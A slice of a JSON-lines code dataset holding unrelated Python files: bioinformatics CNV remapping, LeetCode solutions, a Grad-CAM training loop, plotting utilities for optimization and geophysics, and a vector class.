(nDeleteReactions) + '\\n')\r\n# f.write ('# Number of parameter changes = ' + str (nParameterChanges) + '\\n')\r\n# f.write ('# Final fitness = ' + str(newPopulation[0].fitness) + '\\n')\r\n# f.write(astr)\r\n# f.close() \r\n \r\n# # f = open(\"fitness_\" + str(seed) + \".txt\", \"w\") \r\n# # for index, fitness in enumerate (fitnessArray):\r\n# # f.write (str (index) + ', ' + str(fitness) + '\\n')\r\n# # f.close() \r\n# else:\r\n# f = open(\"fail\" + str(seed) + \".txt\", \"w\")\r\n# f.write(str(newPopulation[0].fitness))\r\n# f.close() \r\n\r\n \r\n \r\n\r\n \r\n\r\n","sub_path":"evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":20635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582868957","text":"\r\n\r\n#%%-----------------------------------------------IMPORTS---------------------------------------------\r\nimport datetime\r\nimport os\r\n\r\nclass Note():\r\n '''\r\n This class is designed for organizing class notes\r\n '''\r\n directory = r\"C:\\Users\\Patrick\\AppData\\Local\\Continuum\\Anaconda3\\Lib\\site-packages\\mined_minds\\day\\cls\\class_notes\"\r\n \r\n note_header = '''\r\n######################################################################\r\n# #\r\n# Mined Minds Class Notes #\r\n# #\r\n######################################################################\\n\\n'''\r\n\r\n def __init__(self): #\r\n #self.directory = Note.directory # \r\n self.date = datetime.datetime.today() #\r\n self.filename = self.date.strftime('%A_%B_%Y'+'.txt') #\r\n self.abspath = os.path.join(self.directory, self.filename) #\r\n self.file = open(self.abspath, \"a+\") #\r\n self.write(Note.note_header) #\r\n self.isopen = self.file.closed #\r\n \r\n def openn(self): #\r\n self.file = open(self.abspath, \"a+\") # \r\n \r\n def write(self, line): #\r\n self.file.write(line) #\r\n \r\n def close(self): #\r\n self.file.close() #\r\n \r\n def read(self): #\r\n if self.isopen: #\r\n self.openn() #\r\n print(self.file.read()) #\r\n else:\r\n print(self.file.read()) #\r\n \r\n def delete(self): #make it work!\r\n self.file.close()\r\n self.file.remove()\r\n","sub_path":"tools/day/cls/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"398203274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 9 14:59:01 2017\n\n@author: Caiyd\n\"\"\"\n\nfrom collections import defaultdict\nimport os\nimport numpy as np\nimport pandas as pd\nimport click\n\n\ndef bedtools(cnv_target_file, lastout, outfile):\n tmp_interfile = 'bed_%s' % outfile\n inter_file = 'inter_%s' % tmp_interfile\n fileA = 'fileA_%s' % outfile\n fileB = 'fileB_%s' % outfile\n sortedA = '%s.sorted' % fileA\n sortedB = '%s.sorted' % fileB\n command1 = r\"\"\"sed '1d' %s| awk '{print $1\"\\t\"$2\"\\t\"$3\"\\t\"$1\":\"$2\"-\"$3}' > %s\"\"\" % (cnv_target_file, fileA)\n command2 = r\"\"\"awk '{print $3\"\\t\"$4\"\\t\"$5\"\\t\"$1\"\\t\"$2}' %s > %s\"\"\" % (lastout, fileB)\n command3 = r\"\"\"bedtools intersect -a %s -b %s -wb > %s\"\"\" % (sortedA, sortedB, tmp_interfile)\n command4 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (fileA, sortedA)\n command5 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (fileB, sortedB)\n command6 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (tmp_interfile, inter_file)\n os.system(command1)\n os.system(command2)\n os.system(command4)\n os.system(command5)\n os.system(command3)\n os.system(command6)\n os.remove(fileA)\n os.remove(fileB)\n os.remove(sortedA)\n os.remove(sortedB)\n os.remove(tmp_interfile)\n return inter_file\n\n\n\n\ndef loadcnv(cnv_file):\n cnv_dict = {}\n with open(cnv_file) as f:\n for n_line, line in enumerate(f):\n line = line.strip().split('\\t')\n if n_line != 0:\n id_ = '%s:%s-%s' % tuple(line[:3])\n cnv_ay = np.array(line[8: boundary_index], dtype='float64')\n cnv_dict[id_] = cnv_ay\n else:\n boundary_index = line.index('average') # avg sd\n sample_ay = np.array(line[8: boundary_index], dtype='unicode_')\n return cnv_dict, sample_ay\n\n\n\ndef load_inter_file(inter_file, outfile, asm_cnv_dict, oar_cnv_dict, asm_sample_ay, oar_sample_ay):\n asm_id_list = []\n oar_id_list = []\n asm_cnv_list = []\n oar_cnv_list = []\n with open(outfile, 'w') as f_write:\n with open(inter_file) as f_read:\n for n_line, line in enumerate(f_read):\n if n_line != 0:\n line = line.strip().split()\n asm_id = line[3]\n oar_id = line[7]\n if asm_id_list:\n if asm_id_list[-1] != asm_id and oar_id_list != oar_id:\n asm_chr_list = np.unique([x.split(':')[0] for x in asm_id_list])\n assert len(asm_chr_list) == 1\n asm_chr = asm_chr_list[0]\n asm_pos_list = [x.split(':')[1].split('-') for x in asm_id_list]\n asm_start = asm_pos_list[0][0]\n asm_end = asm_pos_list[-1][1]\n asm_cnv = [str(x) for x in np.mean(asm_cnv_list, axis=0)]\n oar_cnv = [str(x) for x in np.mean(oar_cnv_list, axis=0)]\n f_write.write('%s\\t%s\\t%s\\t' % (asm_chr, asm_start, asm_end))\n f_write.write('\\t'.join(asm_cnv) + '\\t')\n f_write.write('\\t'.join(oar_cnv) + '\\n')\n asm_id_list = [asm_id]\n oar_id_list = [oar_id]\n asm_cnv_list = [asm_cnv_dict[asm_id]]\n oar_cnv_list = [oar_cnv_dict[oar_id]]\n else:\n asm_id_list.append(asm_id)\n oar_id_list.append(oar_id)\n asm_cnv_list.append(asm_cnv_dict[asm_id])\n oar_cnv_list.append(oar_cnv_dict[oar_id])\n else:\n f_write.write('chr\\tstart\\tend\\t')\n f_write.write('\\t'.join(asm_sample_ay)+'\\t')\n f_write.write('\\t'.join(oar_sample_ay)+'\\n')\n\n\n@click.command()\n@click.argument('lastout')\n@click.argument('cnv_query_file')\n@click.argument('cnv_target_file')\n@click.argument('outfile')\ndef main(lastout, cnv_query_file, cnv_target_file, outfile):\n asm_cnv_dict, asm_sample_ay = loadcnv(cnv_target_file)\n oar_cnv_dict, oar_sample_ay = loadcnv(cnv_query_file)\n interfile = bedtools(cnv_target_file, lastout, outfile)\n load_inter_file(interfile, outfile, asm_cnv_dict, oar_cnv_dict, asm_sample_ay, oar_sample_ay)\n\n\nif __name__ == '__main__':\n main()","sub_path":"cnv_tools/Remap/RemapCNV_2_merge_new.py","file_name":"RemapCNV_2_merge_new.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"336815539","text":"\n\n#calss header\nclass _SCREAM():\n\tdef __init__(self,): \n\t\tself.name = \"SCREAM\"\n\t\tself.definitions = [u'a loud, high sound you make when very frightened, excited, or angry: ', u'a person, thing, or situation that is very funny: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scream.py","file_name":"_scream.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"118914421","text":"class Solution(object):\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[0 for y in range(n)] for x in range(m)]\n for x in range(m):\n for y in range(n):\n if x==0 or y==0:\n dp[x][y] = 1\n else:\n dp[x][y] = dp[x-1][y]+dp[x][y-1]\n return dp[m-1][n-1]\n ","sub_path":"062_Unique Paths.py","file_name":"062_Unique Paths.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"513646738","text":"import collections\nimport math\nfrom typing import List\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def __repr__(self):\n return f\"{self.val}\"\n\n\nclass Codec:\n def serialize(self, root):\n if not root:\n return ''\n queue = collections.deque()\n queue.append(root)\n res = ''\n while queue:\n node = queue.popleft()\n if not node:\n res += 'None,'\n continue\n res += str(node.val) + ','\n queue.append(node.left)\n queue.append(node.right)\n return res\n\n def deserialize(self, data):\n if not data:\n return None\n ls = data.split(',')\n root = TreeNode(int(ls[0]))\n queue = collections.deque()\n queue.append(root)\n i = 1\n while queue and i < len(ls):\n node = queue.popleft()\n if ls[i] != 'None':\n left = TreeNode(int(ls[i]))\n node.left = left\n queue.append(left)\n i += 1\n if ls[i] != 'None':\n right = TreeNode(int(ls[i]))\n node.right = right\n queue.append(right)\n i += 1\n return root\n\n\nif __name__ == \"__main__\":\n # Your Codec object will be instantiated and called as such:\n codec = Codec()\n\n root = TreeNode(1)\n node_2 = TreeNode(2)\n node_3 = TreeNode(3)\n node_4 = TreeNode(4)\n node_5 = TreeNode(5)\n\n # root.left = node_2\n # root.right = node_3\n # node_3.left = node_4\n # node_3.right = node_5\n\n root.left = node_2\n root.right = node_5\n node_2.left = node_3\n node_2.right = node_4\n\n serialized = codec.serialize(root)\n print(serialized)\n deserialized = codec.deserialize(serialized)\n\n # dfs left traversal\n def dfs_preorder_traversal(node):\n s = [node]\n res = []\n while s:\n curr = s.pop()\n res.append(curr.val)\n if curr.right:\n s.append(curr.right)\n if curr.left:\n s.append(curr.left)\n\n print(res)\n\n def dfs_inorder_traversal(node):\n s = []\n curr = node\n res = []\n while curr or s:\n while curr:\n s.append(curr)\n curr = curr.left\n curr = s.pop()\n res.append(curr.val)\n curr = curr.right\n\n print(res)\n\n def dfs_postorder_traversal(node):\n s = [node]\n res = []\n while s:\n curr = s.pop()\n res.append(curr.val)\n\n if curr.left:\n s.append(curr.left)\n if curr.right:\n s.append(curr.right)\n\n print(res[::-1])\n\n print('DFS pre-order traversal')\n dfs_preorder_traversal(deserialized)\n\n print('DFS in-order traversal')\n dfs_inorder_traversal(deserialized)\n\n print('DFS post-order traversal')\n dfs_postorder_traversal(deserialized)\n","sub_path":"leetcode/p0297_serialize_and_deserialize_binary_tree/solution_bfs.py","file_name":"solution_bfs.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"2679822","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Karanjot\n#\n# Created: 26/04/2017\n# Copyright: (c) Karanjot 2017\n# Licence: \n#-------------------------------------------------------------------------------\nfrom graphics import *\n\ndef main():\n\n #Create a defgault 200 x 200 window\n win = GraphWin(\"tic - Tac - Toe\") #size of window can be changed by adding in x and y values next to it\n\n #Set coordinates to go from (0,0) in the lower left and (3,3) in the upper right\n win.setCoords(0.0,0.0,3.0,3.0)\n\n #Draw verical lines - side ways\n Line(Point(1,0), Point(1,3)).draw(win)\n Line(Point(2,0), Point(2,3)).draw(win)\n\n #Draw horizontal line - up and down\n Line(Point(0,1), Point(3,1)).draw(win)\n Line(Point(0,2), Point(3,2)).draw(win)\n\n win.getMouse()\n win.close()\n\nmain()","sub_path":"tic tac toe.py","file_name":"tic tac toe.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"266039907","text":"\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nimport torchvision\nimport cv2\nimport argparse\nimport time\n\nfrom gradcam import GradCam \nfrom resnet import load_resnet18\nfrom loss.delu import bwLoss\nfrom data.data_manager import DataManager\nfrom loss.sord_function import sord_function\nfrom eval import evaluate, _compute_scores\n\nclass Net(nn.Module):\n \n def __init__(self):\n super(Net, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2), # last convolution\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.drop_out = nn.Dropout()\n self.fc1 = nn.Linear(9216, 1000) # 80: 25600, 70: 18496 40000\n self.fc2 = nn.Linear(1000, 4)\n \n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = x.reshape(x.size(0), -1)\n x = self.drop_out(x)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n\ndef calculate_measures(groundTs, masks):\n for mask, groundT in zip(masks, groundTs): \n if(mask.sum() == 0):\n ''' handle the case when the generated explaination is composed of all zeros '''\n precision = 0\n recall = 0\n else:\n precision = np.sum(groundT*mask) / (np.sum(groundT*mask) + np.sum((1-groundT)*mask))\n recall = np.sum(groundT*mask) / (np.sum(groundT*mask) + np.sum(groundT*(1-mask)))\n\n sumPrec += precision\n sumRec += recall\n\n return sumPrec, sumRec\n\n\ndef training_model(model, train_loader, bce, optimizer, epoch, num_epochs, n_batches, writer):\n lamb = 0.1\n sumMeanPrec = 0\n sumMeanRec = 0\n\n model.train()\n for i, (images, metadata) in enumerate(train_loader):\n blackGroundTindx = []\n weightForWhitePixel = torch.tensor([14.0])\n weightForBlackPixel = torch.tensor([1.0])\n masks = grad_cam(images,metadata,training=True)\n\n model.train()\n\n tensors_groundTs = []\n for idx, (hospital, expl) in enumerate(zip(metadata[\"hospital\"], metadata[\"explanation\"])):\n npy_groundT = np.load(\"/home/dataset/segmentation frames/\"+hospital+\"/\"+expl)\n resizedGroundT = cv2.resize(npy_groundT, (14,14), cv2.INTER_AREA) \n if resizedGroundT.sum() == 0:\n ''' after resizing, small ground truths may lost all the information.\n We need to track them, if any'''\n blackGroundTindx.append(idx)\n continue\n else:\n resizedGroundT = np.where(resizedGroundT > 0, 255, 0) # pixels grater than 0 are set to 255\n normalizedGroundT = resizedGroundT / 255 # normalize expl between 0 and 1\n tensors_groundTs.append(torch.from_numpy(normalizedGroundT))\n \n groundTs = torch.stack(tensors_groundTs).double() \n\n optimizer.zero_grad()\n weightedGroundTs = torch.where(groundTs > 0, weightForWhitePixel, weightForBlackPixel)\n while blackGroundTindx:\n indx = blackGroundTindx.pop()\n masks = torch.cat((masks[:indx,:,:], masks[indx+1:,:,:]))\n batchSize = len(masks)\n lossG = bce(masks, groundTs)\n weightedLoss = lossG * weightedGroundTs\n loss_gradcam = weightedLoss.mean()\n loss_gradcam = loss_gradcam.cuda()\n loss_label = sord_function(model, images, metadata)\n loss = (lamb * loss_label) + ((1 - lamb) * loss_gradcam)\n loss.backward()\n optimizer.step()\n\n npy_masks = masks.cpu().detach().numpy()\n npy_groundTs = groundTs.cpu().detach().numpy()\n precision, recall = calculate_measures(npy_groundTs, npy_masks)\n\n sumMeanPrec += prec / batchSize\n sumMeanRec += rec / batchSize\n \n if (i + 1) % 105 == 0: \n print('Epoch [{}/{}], Step [{}/{}], Total Loss: {:.4f}, EXPLS:[precision: {:.2f}%, recall: {:.2f}%]'\n .format((epoch + 1), num_epochs, (i + 1), len(train_loader), loss.item(), (sumMeanPrec/n_batches)*100, (sumMeanRec/n_batches)*100))\n\n # If you use Tensorboard as visualization tool\n writer.add_scalar(\"Training: Loss\", loss.item(), str(epoch + 1))\n writer.add_scalar(\"Training: Precision\", (sumMeanPrec/n_batches)*100, str(epoch + 1))\n writer.add_scalar(\"Training: Precision\", (sumMeanRec/n_batches)*100, str(epoch + 1))\n if (epoch+1) % 10 == 0: \n torch.save(model.state_dict(), \"./checkpoints/SimpleCNN_epoch_\"+str(epoch+1)+\".pth\") \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # Dataset\n parser.add_argument(\"--num_classes\", default=4, type=int)\n parser.add_argument('--hospitals', nargs='+', type=str, default=['Germania', 'Pavia', 'Lucca', 'Brescia', 'Gemelli - Roma', 'Tione', 'Trento'], \n help='Name of the hospital / folder to be used.')\n parser.add_argument('--dataset_root', default='/home/dataset/', type=str, help='Root folder for the datasets.')\n parser.add_argument('--split_file', default='80_20_activeset.csv', type=str, help='File defining train and test splits.')\n parser.add_argument('--standard_image_size', nargs='+', type=int, default=[250, 250])\n parser.add_argument('--input_image_size', nargs='+', type=int, default=[224,224]) \n parser.add_argument('--domains_count', type=int, default=2)\n parser.add_argument('--domain_label', type=str, default=\"sensor_label\")\n parser.add_argument('--affine_sigma', type=float, default=0.0)\n parser.add_argument('--rotation', type=float, default=23.0)\n # Environment\n parser.add_argument(\"--epochs\", type=int, default=100, help=\"number of epochs\")\n parser.add_argument(\"--num_workers\", default=10, type=int)\n parser.add_argument('--test_size', default=0.3, type=float, help='Relative size of the test set.')\n parser.add_argument('--seed', default=0, type=int, help='Random seed.')\n parser.add_argument('--split', default='patient_hash', type=str, help='The split strategy.')\n parser.add_argument('--stratify', default=None, type=str, help='The field to stratify by.')\n parser.add_argument(\"--gradient_accumulations\", type=int, default=2, help=\"number of gradient accums before step\")\n parser.add_argument(\"--pretrained_weights\", type=str, help=\"if specified starts from checkpoint model\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=33, help=\"interval between saving model weights\")\n parser.add_argument(\"--evaluation_interval\", type=int, default=3, help=\"interval evaluations on validation set\")\n # Network\n parser.add_argument(\"--batch_size\", default=16, type=int)\n opt = parser.parse_args()\n\n writer = SummaryWriter(\"./runs/\")\n \n num_epochs = 100\n learning_rate = 0.001\n\n cuda = torch.cuda.is_available()\n if cuda:\n print('Using GPU for acceleration')\n else:\n print('Using CPU...')\n\n model = load_resnet18() # or Net() for Simple CNN\n # Start from checkpoint, if specified\n if opt.pretrained_weights:\n model.load_state_dict(torch.load(opt.pretrained_weights))\n print(\"pretrained model loaded!\") \n if cuda:\n model = model.cuda()\n print('Loaded model on GPU')\n\n data_manager = DataManager(opt) \n\n train_dataloader = data_manager.get_dataloaders()[\"train\"]\n test_dataloader = data_manager.get_dataloaders()[\"validation\"]\n\n grad_cam= GradCam(model=model, feature_module=model.layer4, \\\n target_layer_names=[\"1\"], use_cuda=True) # Target layer = last convolutional layer, feature_module = layer where the last conv. layer is\n\n batch_size = len(train_dataloader)\n bce = nn.BCELoss(reduce=False)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n \n for epoch in range(num_epochs):\n training_model(model, train_dataloader, bce, cross_entropy, optimizer, epoch, num_epochs, batch_size, writer)\n if (epoch+1) % 10 == 0:\n evaluate(model, grad_cam, calculate_measures, test_dataloader, writer, epoch, batch_size)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"284116193","text":"import numpy as np\r\nimport sympy as sym\r\nsym.init_printing()\r\n\r\ndef matrix_multiplication(first_matrix, second_matrix):\r\n '''\r\n Returns the product of two matrices\r\n \r\n Parameters\r\n ----------\r\n first_matrix: 2D array\r\n A two dimensional array with elements of the second matrix\r\n \r\n second_matrix: 2D array\r\n A two dimensional array with elements of the first matrix\r\n \r\n Examples\r\n --------\r\n >> A = np.array([[5/2, 3, 5, 1], [-8, 7/6, 5, 6], [4/5, 2, -9, 5]])\r\n >> B = np.array([[8, 4, 7/3, -2], [5/8, -5, 3, 9], [1, 8, 2, 6/5]]).T\r\n >> matrix_operations(A, B)\r\n '''\r\n \r\n A = first_matrix\r\n \r\n B = second_matrix\r\n \r\n Results = np.dot(A,B)\r\n \r\n return sym.Matrix(Results)","sub_path":"pylinearalgebra/matrix_multiplication.py","file_name":"matrix_multiplication.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"104262453","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nEste es un programa en Python que sirve para la visualizacion de los datos\nSirve para ver:\n -Curvas de convergencia\n -Superficies aproximadas\n -Datos Geofísicos: Para esto hay que definir si los aarchivos traen encabezado o no\n \nSi, le dedique más esfuerzo que el que le debí haber dedicado.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport math\nimport pandas as pd\n\n#Funciones no propias:\ndef truncate(number, decimals=0):\n \"\"\"\n Returns a value truncated to a specific number of decimal places.\n \"\"\"\n if not isinstance(decimals, int):\n raise TypeError(\"decimal places must be an integer.\")\n elif decimals < 0:\n raise ValueError(\"decimal places has to be 0 or more.\")\n elif decimals == 0:\n return math.trunc(number)\n\n factor = 10.0 ** decimals\n return math.trunc(number * factor) / factor\n\n#Funciones propias:\ndef Esferica(x,y):\n return x ** 2+y**2\n\ndef Rastrigin(x,y):\n return x ** 2 - 10 * np.cos(2 * np.pi * x) ** 2 + y ** 2 - 10 * np.cos(2 * np.pi * y) + 20\n\ndef mallaCuadrada(Min,Max):\n x = np.linspace(Min,Max,1000)\n y = np.linspace(Min,Max,1000)\n x,y= np.meshgrid(x,y)\n return x,y\n\ndef GrafContorno(x,y,z): #falta poner los datos \n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set(title = 'Anomalía magnética', xlabel = 'x[Km]', ylabel = 'y[km]')\n cs = ax.contourf(x,y,z)\n c =fig.colorbar(cs)\n plt.show()\n \n#Lectura de datos nDimensionales:\ndef LeerOpt(filename,case): \n lines = len(open(filename).readlines())\n if case == 1:\n lines = lines - 1\n with open(filename) as f:\n line = f.readline()\n col = (len(line.split()))\n f.close()\n \n M = np.zeros((lines,col))\n cnt=0\n with open(filename,'r') as f:\n if case == 1:\n next(f)\n lin = f.readline()\n for i in range(lines):\n lin_sep = lin.split()\n #Por alguna razón para leer los datos de sísmica, me sale con col-1, para los demas es co\n #for j in range(col) \n for j in range(col):\n M[i,j]=(float(lin_sep[j]))\n lin = f.readline()\n cnt= cnt + 1\n f.close()\n return M\n\ndef DefinirRuta(NombreArchivo):\n if os.path.exists(NombreArchivo):\n ruta =os.getcwd()\n filename= ruta +'/'+ NombreArchivo\n else:\n sys.exit('No existe el archivo')\n return filename\n\ndef grafSuperficie(x,y,z,x1,y1,z1):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n \n cs = ax.contourf(x,y,z, cmap='inferno')\n ax.scatter(x1,y1,c='g',marker ='.')\n c =fig.colorbar(cs)\n plt.suptitle('Esférica Q=50 Pc =1.0 Pm =0.1')\n plt.savefig('EsfQ50Pc1.0.png')\n plt.show()\n \ndef grafCurvConv(x,y):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set(title = 'Curva de Convergencia', xlabel = '# de generaciones', ylabel = 'Convergencia')\n ax.scatter(x,y,marker='.')\n plt.suptitle('Esférica Q=50 Pc =1.0 Pm =0.1')\n plt.grid()\n plt.savefig('ConvEsfQ50Pc1.0.png')\n plt.show()\n \ndef grafDatos1d(x,y,title,xlabel,ylabel):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if title == 'SEV':\n ax.set(title = title, xlabel = xlabel, ylabel = ylabel, xscale = 'log')\n else:\n ax.set(title = title, xlabel = xlabel, ylabel = ylabel, xscale = 'linear')\n ax.scatter(x, y, marker='.')\n plt.grid()\n plt.show()\n\ndef MallaDatos(x,y,z):\n for i in range(len(x)):\n dx= truncate(np.abs(x[i+1]-x[i]),5)\n if (dx != 0):\n break\n for i in range(len(y)):\n dy= truncate(np.abs(y[i+1]-y[i]),5)\n if (dy != 0):\n break\n \n Nx = int(((np.max(x) - np.min(x)) / (dx)) + 1)\n Ny = int(((np.max(y) - np.min(y)) / (dy)) + 1)\n \n x.shape=(Nx,Nx)\n y.shape=(Ny,Ny)\n z.shape=(Nx,Ny)\n return x,y,z \n\n\n\n#Programa principal\n#Se ingresa el archivo\nf = DefinirRuta('AnomM_1.xyz') \n\n#f1 = DefinirRuta('Resultados.dat')\n\n#Lectura de datos\nM = LeerOpt(f,2)\n\n\n#M1 = LeerOpt(f1,2)#Se pone 1 si se quiere saltar el primer renglon\n\n#Para graficar datos 1d:\n#grafDatos1d(M[:,0], M[:,1], 'Anomalia', 'x[m]', 'Delta G')\n\n#Para graficar datos 2d:\nx, y, z = MallaDatos(M[:,0], M[:,1], M[:,2])\nGrafContorno(x, y, z)\n#Para curva de convergencia\n#grafCurvConv(M[:,0],M[:,1])\n\n#Análisis de rendimiento:\n#[x,y]=mallaCuadrada(-5.12, 5.12) #Rastrigin\n#[x,y]=mallaCuadrada(-5, 5) #Esférica\n#Esferica\n#z=Esferica(x, y)\n#Rastrigin\n#z=Rastrigin(x, y)\n\n#grafSuperficie(x, y, z, M1[:,3], M1[:,4], M1[:,2])\n","sub_path":"Sismica/FuncOptimizar.py","file_name":"FuncOptimizar.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"151104339","text":"\"\"\"vector.py contains definitions for Vector and VectorArray classes\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport numpy as np\n\n\nclass BaseVector(np.ndarray):\n \"\"\"Class to contain basic operations used by all Vector classes\"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"BaseVector cannot be created\"\"\"\n raise NotImplementedError('Please specify Vector2 or Vector3')\n\n @property\n def x(self):\n \"\"\"x-component of vector\"\"\"\n return self[0]\n\n @x.setter\n def x(self, value):\n self[0] = value\n\n @property\n def y(self):\n \"\"\"y-component of vector\"\"\"\n return self[1]\n\n @y.setter\n def y(self, value):\n self[1] = value\n\n @property\n def length(self):\n \"\"\"Length of vector\"\"\"\n return float(np.sqrt(np.sum(self**2)))\n\n @length.setter\n def length(self, value):\n if not np.isscalar(value):\n raise ValueError('Length must be a scalar')\n value = float(value)\n if self.length != 0:\n new_length = value/self.length\n self *= new_length\n return\n if value != 0:\n raise ZeroDivisionError('Cannot resize vector of length 0 to '\n 'nonzero length')\n\n @property\n def rho(self):\n \"\"\"Radial coordinate of this vector (equal to the length of the vector)\"\"\"\n return self.length\n\n @rho.setter\n def rho(self, value):\n self.length = value\n\n @property\n def theta(self):\n \"\"\"\n Angular coordinate / azimuthal angle of this vector in radians\n\n Based on polar coordinate space (or sperical coordinate space for `Vector3`)\n returns angle between this vector and the positive x-axis\n range: (-pi <= theta <= pi)\n \"\"\"\n return float(np.arctan2(self.y, self.x))\n\n # pylint: disable=fixme\n # TODO: Add `theta` and `theta_deg` setters\n # @theta.setter\n # def theta(self, value):\n # ...\n\n @property\n def theta_deg(self):\n \"\"\"\n Angular coordinate / azimuthal angle of this vector in degrees\n\n Based on polar coordinate space (or sperical coordinate space for `Vector3`)\n returns angle between this vector and the positive x-axis\n range: (-180 <= theta_deg <= 180)\n \"\"\"\n return self.theta * 180 / np.pi\n\n def as_length(self, value):\n \"\"\"Return a new vector scaled to given length\"\"\"\n new_vec = self.copy()\n new_vec.length = value\n return new_vec\n\n def as_percent(self, value):\n \"\"\"Return a new vector scaled by given decimal percent\"\"\"\n new_vec = self.copy()\n new_vec.length = value * self.length\n return new_vec\n\n def as_unit(self):\n \"\"\"Return a new vector scaled to length 1\"\"\"\n new_vec = self.copy()\n new_vec.normalize()\n return new_vec\n\n def normalize(self):\n \"\"\"Scale the length of a vector to 1 in place\"\"\"\n self.length = 1\n return self\n\n def dot(self, vec):\n \"\"\"Dot product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Dot product operand must be a vector')\n return np.dot(self, vec)\n\n def cross(self, vec):\n \"\"\"Cross product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Cross product operand must be a vector')\n return self.__class__(np.cross(self, vec))\n\n def angle(self, vec, unit='rad'):\n \"\"\"Calculate the angle between two Vectors\n\n unit: unit for returned angle, either 'rad' or 'deg'. Defaults to 'rad'\n \"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Angle operand must be of class {}'\n .format(self.__class__.__name__))\n if unit not in ['deg', 'rad']:\n raise ValueError('Only units of rad or deg are supported')\n\n denom = self.length * vec.length\n if denom == 0:\n raise ZeroDivisionError('Cannot calculate angle between '\n 'zero-length vector(s)')\n\n ang = np.arccos(self.dot(vec) / denom)\n if unit == 'deg':\n ang = ang * 180 / np.pi\n return ang\n\n def __mul__(self, multiplier):\n return self.__class__(self.view(np.ndarray) * multiplier)\n\n\nclass Vector3(BaseVector):\n \"\"\"Primitive 3D vector defined from the origin\n\n New Vector3 can be created with:\n - another Vector3\n - length-3 array\n - x, y, and y values\n - no input (returns [0., 0., 0.])\n \"\"\"\n\n # pylint: disable=fixme\n # TODO: add support for instantiating Vector3 with `polar`=True\n\n def __new__(cls, x=None, y=None, z=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y, Z):\n \"\"\"Build Vector3 from another Vector3, [x, y, z], or x/y/z\"\"\"\n if isinstance(X, cls) and Y is None and Z is None:\n return cls(X.x, X.y, X.z)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 3 and\n Y is None and Z is None):\n return cls(X[0], X[1], X[2])\n if X is None and Y is None and Z is None:\n return cls(0, 0, 0)\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n xyz = np.r_[X, Y, Z]\n xyz = xyz.astype(float)\n return xyz.view(cls)\n raise ValueError('Invalid input for Vector3 - must be an instance '\n 'of a Vector3, a length-3 array, 3 scalars, or '\n 'nothing for [0., 0., 0.]')\n\n return read_array(x, y, z)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n \"\"\"This is called at the end of ufuncs\n\n If the output is the wrong shape, return the ndarray view\n instead of vector view\n \"\"\"\n if out_arr.shape != 